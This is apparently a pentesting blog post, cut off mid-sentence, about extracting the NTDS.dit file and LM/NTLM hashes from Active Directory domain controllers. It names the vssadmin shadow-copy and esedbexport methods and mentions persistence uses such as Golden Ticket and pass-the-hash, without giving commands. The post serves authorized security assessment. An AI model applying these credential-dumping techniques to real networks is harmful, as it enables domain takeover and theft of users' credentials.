Extracting NTDS Users Data... The Fastest Way.
Extracting what? One of the most tedious and long tasks a pentester has to do when assessing a company's domain, is the extraction of the NTDS.dit file, located ( usually ) in the Domain Controllers of the Active Directory . Retrieving the hashes of all users from the Active Directory is the first thing that a hacker ( well... I think ) should do after obtaining Domain Admin privileges. Obtaining the LM/NTLM hashes is crucial; it gives a huge list of possibilities to maintain access after an effective exploitation ( i.e. Golden Ticket, password cracking, pass-the hash, etc.) , and looks beautiful when is documented in a pentesting report ;) Common ways to dump hashes There are at least 3 well known ways of extracting the LM/NTLM hashes from Active Directory . Extracting the NTDS.dit file from a shadow copy using vssadmin , dumping the tables datatable and link_table with esedbexport of esedebtools framework , and retrieving the users data using scripts o